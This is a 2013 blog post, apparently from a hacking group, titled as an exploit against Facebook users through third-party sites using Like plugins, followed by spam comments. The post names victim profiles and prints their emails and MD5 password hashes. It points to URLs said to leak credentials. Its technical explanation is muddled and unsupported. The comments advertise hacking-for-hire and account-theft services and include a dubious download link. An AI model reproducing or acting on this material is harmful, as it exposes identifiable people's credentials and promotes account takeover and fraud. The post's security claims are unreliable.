Pages

Friday, June 7, 2013

Exploit Facebook Via External Plugins and Modules


#############################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################


For Example my victim is =======>>> https://www.facebook.com/gaturro22

How i could be able to retrieve his password ? easy


Proof of Concept : Facebook Id ====>>> gaturro22


P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22


So as you can see we got the email & the password :

Email: gonza.la22@gmail.com

Password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44 ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim : ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}


I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!





Posted by at
Labels: ,

7 comments:

  1. UnknownAugust 24, 2013 at 12:17 PM

    Hello please give me the name of the site web that we must like
    sorry for my bad englisn thank you

    ReplyDelete
    Replies
    1. PLUGGERSOctober 13, 2019 at 6:09 PM

      ARE YOU A VICTIM OF FALSE HACKERS & BANK LOAN SCAM⁉️

      We have been having recent complains from individuals about how they lost money 💵 to SPAMMERS who call themselves HACKERS or BANK LOAN OFFERS. They are all over the internet sharing false testimonies. Please do not fall for their lies for this is just a way to LURE you to them.

      They say lies in the likes of such-:
      ▪️Bitcoin Auctioning ▪️Western Union Hack
      ▪️Blank Credit Card ▪️Clearing Criminal Records
      ▪️Loan Offers. ▪️Bank Account Loading
      ▪️Changing University Grades & so on.
      These are all lies and you shouldn’t fall for them.

      🏵GLOBAL PLUGGERS🏵 is here to help you Recover all your Money 💵 that you have been Ripped of.
      WHO ARE GLOBAL PLUGGERS⁉️
      We are a group of Computer💻 Experts who are memebers of the “HACKERONE” Forum. We have dedicated ourselves to help Victims of these SCAM(s) recover all the Money that has been taken falsely from them.

      If you have been a victim of thes Thieves, then you need to contact us as soon as possible so you can get your money back.
      Email-: globalpluggers@gmail.com
      No. +1 (808) 600 0773 ( Number also available on WhatsApp)

      Note:
      Please know that we do not charge you for Fund Recovery Service, Our Funds Recovery Service is to help and so it’s Free.

      We also provide Legit Hacking Services such as-:
      🔸Phone Hacking/Cloning
      🔸Email Hacking & Password Recovery
      🔸Social Media Hacking & Passowrd Recovery
      🔸Deleted Files Recovery 🔸Mobil Tracking
      🔸Virus detection & Elimination.

      Contact-:
      Email globalpluggers@gmail.com
      No. +1 (808) 600 0773 (number also available on WhatsApp)








      Delete
    2. Curt LennixJanuary 20, 2020 at 7:54 AM

      Need The To Hire A Hacker❓ Then contact PYTHONAX✅

      The really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.

      We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.

      Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
      We perform every Hack there is, using special Hacking tools we get from the dark web.

      Some list of Hacking Services we provide are-:
      ▪️Phone Hacking & Cloning ✅
      ▪️Computer Hacking ✅
      ▪️Emails & Social Media Account Hacking✅
      ▪️Recovering Deleted Files✅
      ▪️Tracking & Finding People ✅
      ▪️Hunting Down Scammers✅
      ▪️Hack detecting ✅
      ▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
      ▪️Bitcoin Multiplication✅
      ▪️Binary Option Money Recovery ✅
      ▪️Forex Trading Money Recovery✅
      ▪️IQ Option Money Recovery✅
      And lots more......


      Whatever Hacking service you require, just give us an Email to the Emails Address provided below.
      pythonaxhacks@gmail.com
      pythonaxservices@gmail.com

      2020 © PYTHONAX.

      Delete
    3. Curt LennixJanuary 31, 2020 at 6:04 PM

      Need The To Hire A Hacker❓ Then contact PYTHONAX✅

      The really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.

      We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.

      Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
      We perform every Hack there is, using special Hacking tools we get from the dark web.

      Some list of Hacking Services we provide are-:
      ▪️Phone Hacking & Cloning ✅
      ▪️Computer Hacking ✅
      ▪️Emails & Social Media Account Hacking✅
      ▪️Recovering Deleted Files✅
      ▪️Tracking & Finding People ✅
      ▪️Hunting Down Scammers✅
      ▪️Hack detecting ✅
      ▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
      ▪️Bitcoin Multiplication✅
      ▪️Binary Option Money Recovery ✅
      ▪️Forex Trading Money Recovery✅
      ▪️IQ Option Money Recovery✅
      And lots more......


      Whatever Hacking service you require, just give us an Email to the Emails Address provided below.
      pythonaxhacks@gmail.com
      pythonaxservices@gmail.com

      2020 © PYTHONAX.

      Delete
    4. Curt LennixMarch 6, 2020 at 4:46 PM

      NEED TO HIRE A HACKER?! Then Hire PYTHONAX‼️

      PYTHONAX are a group of Certified and Registered Hackers under the Hackers Forum HackerOne. We usually Advertised in the Dark web, but the rate at wish individuals are been defrauded (Scammed) by false Hackers has actually forced us to start trowing adverts on the regular web.

      Based on the HackerOne standard, Hacking for individuals are not allowed and that’s why our services are more reliable and stay undetected. If you are caught, then we are caught, or if you have a problem with our services then we also have a problem of get caught by HackerOne Authorities. We meet up to every job we take as our insurance policy of not getting caught by the HackerOne Authorities.

      COUPLE OF HACKING SERVICES WE OFFER-:
      ▪️Phone Hacking/Cloning ▪️Email Hacking ▪️Social Media account Hacking ▪️Keylogging installations ▪️Deleted Emails, Files & Documents Recovery ▪️Website Hacking ▪️Scam Tracking ▪️Money/Bitcoin Recovery ▪️Binary Option Recovery ▪️Cyber Bully ▪️Virus Installation/ Detection..........e.t.c

      Feel free to Email is if you need a Hacking services that’s not listed above. We are here to hack for you
      Contact us via the email-: Pythonaxhacks@gmail.com
      Pythonaxservices@gmail.com

      2020 © All Right Reserved.

      Delete
    5. AnonymousApril 4, 2022 at 7:58 AM

      Exploit Facebook Via External Plugins And Modules >>>>> Download Now

      >>>>> Download Full

      Exploit Facebook Via External Plugins And Modules >>>>> Download LINK

      >>>>> Download Now

      Exploit Facebook Via External Plugins And Modules >>>>> Download Full

      >>>>> Download LINK Nu

      Delete
  2. UnknownAugust 9, 2018 at 9:12 PM

    Thanks for your share! tai vietkey truyện tình yêu tuổi học trò danlod beetalk love you with all my heart quote cool math games johnny upgrade hacked

    ReplyDelete

Subscribe to: Post Comments (Atom)